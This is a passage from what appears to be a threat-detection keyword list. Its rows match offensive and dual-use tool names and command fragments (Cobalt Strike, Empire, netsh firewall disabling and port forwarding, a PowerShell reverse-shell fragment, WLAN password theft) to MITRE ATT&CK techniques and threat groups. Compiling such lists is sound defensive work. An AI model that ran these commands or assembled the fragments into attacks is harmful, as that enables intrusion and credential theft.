T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*netlogon_##*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*netntlm.pl *,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*NetNTLMtoSilverTicket.git*,offensive_tool_keyword,NetNTLMtoSilverTicket,Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.,T1110.001 - T1558.003 - T1558.004,TA0006 - TA0008 - TA0002,N/A,N/A,Credential Access,https://github.com/NotMedic/NetNTLMtoSilverTicket,1,1,N/A,10,7,635,105,2021-07-26T15:16:20Z,2019-01-14T15:32:27Z -*NetNTLMtoSilverTicket-master*,offensive_tool_keyword,NetNTLMtoSilverTicket,Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.,T1110.001 - T1558.003 - T1558.004,TA0006 - TA0008 - TA0002,N/A,N/A,Credential Access,https://github.com/NotMedic/NetNTLMtoSilverTicket,1,1,N/A,10,7,635,105,2021-07-26T15:16:20Z,2019-01-14T15:32:27Z -*netpass.exe*,offensive_tool_keyword,netpass,When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/network_password_recovery.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*netpass.zip*,offensive_tool_keyword,netpass,When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/network_password_recovery.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*netpass_x64.exe*,offensive_tool_keyword,netpass,When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/network_password_recovery.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*netpass-x64.zip*,offensive_tool_keyword,netpass,When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/network_password_recovery.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*netscan.exe /*,greyware_tool_keyword,softperfect networkscanner,SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell,T1046 - T1065 - T1135 ,TA0007 ,N/A,N/A,Discovery,https://www.softperfect.com/products/networkscanner/,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*netscan_setup.exe*,greyware_tool_keyword,netscan,SoftPerfect Network Scanner abused by threat actor,T1040 - T1046 - T1018,TA0007 - TA0010 - TA0001,N/A,N/A,Network Exploitation tools,https://www.softperfect.com/products/networkscanner/,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*NetSh Advfirewall set allprofiles state off*,greyware_tool_keyword,netsh,Disable Windows Firewall,T1562.004 - T1055.001,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*netsh interface portproxy add v4tov4 listenport=* connectport=* connectaddress=*,greyware_tool_keyword,netsh,commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z -*netsh interface portproxy add v4tov4*listenaddress=* listenport=*connectaddress=*connectport*,greyware_tool_keyword,netsh,The actor has used the following commands to enable port forwarding [T1090] on the host,T1090.003 - T1123,TA0005 - TA0002,N/A,Volt Typhoon,Credential Access,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*netsh interface portproxy delete v4tov4 listenport=*,greyware_tool_keyword,netsh,commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z -*netsh interface portproxy show v4tov4*,greyware_tool_keyword,netsh,commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z -*netsh wlan show profile $wlan key=clear | Select-String *?<=Key Content\s+:\s*,offensive_tool_keyword,WLAN-Windows-Passwords,Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.,T1056.005 - T1552.001 - T1119 - T1071.001,TA0004 - TA0006 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*netsh.exe add helper *\temp\*.dll*,greyware_tool_keyword,NetshRun,Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want,T1546.008 - T1112 - T1037 - T1055 - T1218.001,TA0003 - TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/gtworek/PSBits/blob/master/NetShRun,1,0,N/A,N/A,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*netshrun.dll*,greyware_tool_keyword,NetshRun,Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want,T1546.008 - T1112 - T1037 - T1055 - T1218.001,TA0003 - TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/gtworek/PSBits/blob/master/NetShRun,1,1,N/A,N/A,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*netsniff-ng*,offensive_tool_keyword,netsniff-ng,netsniff-ng is a high performance Linux network sniffer for packet inspection. It can be used for protocol analysis. reverse engineering or network debugging. The gain of performance is reached by 'zero-copy' mechanisms. so that the kernel does not need to copy packets from kernelspace to userspace.,T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0007 - TA0011,N/A,N/A,Sniffing & Spoofing,https://packages.debian.org/fr/sid/netsniff-ng,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*netstat -ano*,greyware_tool_keyword,netstat,Adversaries may attempt to execute recon commands,T1046 - T1069,TA0002 - TA0003,N/A,N/A,Reconnaissance,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*netstat -ant*,greyware_tool_keyword,netstat,View all active TCP connections and the TCP and UDP ports the host is listening on.,T1046 - T1069,TA0002 - TA0003,N/A,N/A,Reconnaissance,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*netstat -tnlp || ss -tnlp*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,0,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*netstat -unlp || ss -unlp*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,0,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*NETSTAT.EXE* -ano*,greyware_tool_keyword,netstat,Adversaries may attempt to execute recon commands,T1046 - T1069,TA0002 - TA0003,N/A,N/A,Reconnaissance,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*nettitude/ETWHash*,offensive_tool_keyword,ETWHash,C# POC to extract NetNTLMv1/v2 hashes from ETW provider,T1556.001,TA0009 ,N/A,N/A,Credential Access,https://github.com/nettitude/ETWHash,1,1,N/A,N/A,3,229,27,2023-05-10T06:45:06Z,2023-04-26T15:53:01Z -*nettitude/MalSCCM*,offensive_tool_keyword,MalSCCM,This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage,T1072 - T1059.005 - T1090,TA0008 - TA0002 - TA0011,N/A,N/A,Exploitation tools,https://github.com/nettitude/MalSCCM,1,1,N/A,10,3,223,34,2023-09-28T17:29:50Z,2022-05-04T08:27:27Z -*netuser_enum*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z -*netview.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Sniffing & Spoofing,https://github.com/SecureAuthCorp/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*netview_enum*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z -*network2john.lua*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*NetworkMiner*,offensive_tool_keyword,NetworkMiner,A Network Forensic Analysis Tool (NFAT),T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0007 - TA0011,N/A,N/A,Sniffing & Spoofing,http://www.netresec.com/?page=NetworkMiner,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*new session to 127.0.0.1:3000*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,0,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*NewAdminAccountCreation.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*New-ElevatedPersistenceOption*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Persistence.psm1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*New-ElevatedPersistenceOption*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*New-HoneyHash*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,New-HoneyHash.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*New-HoneyHash.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1086,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*New-InMemoryModule -ModuleName Win32*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*New-InMemoryModule*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-BypassUACTokenManipulation.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*New-InMemoryModule*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*New-MailBoxExportRequest -Mailbox *@* -FilePath *.aspx*,offensive_tool_keyword,ProxyShell,Microsoft Exchange Servers exploits - ProxyLogon and ProxyShell CVE-2021-27065 CVE-2021-34473 CVE-2021-34523 CVE-2021-31207,T1210.003 - T1190 - T1059.003 - T1059.001 - T1059.005 - T1505,TA0001 - TA0002 - TA0003 - TA0006 - TA0011,N/A,N/A,Exploitation Tools,https://www.cert.ssi.gouv.fr/uploads/ANSSI_TLPWHITE_ProxyShell_ProxyLogon_Sigma_yml.txt,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*New-Object System.Net.Sockets.TCPClient(*$stream = $client.GetStream()*[byte[]]$bytes = 0..65535*,greyware_tool_keyword,powershell,Powershell reverse shell,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md,1,0,greyware tool - risks of False positive !,N/A,10,51169,13280,2023-10-02T15:13:46Z,2016-10-18T07:29:07Z -*new-operator --name * --lhost *,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*New-PSAmsiScanner -*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,0,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -*New-PSDrive -Name T -PSProvider FileSystem -Root \\$IP\transfer *,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel 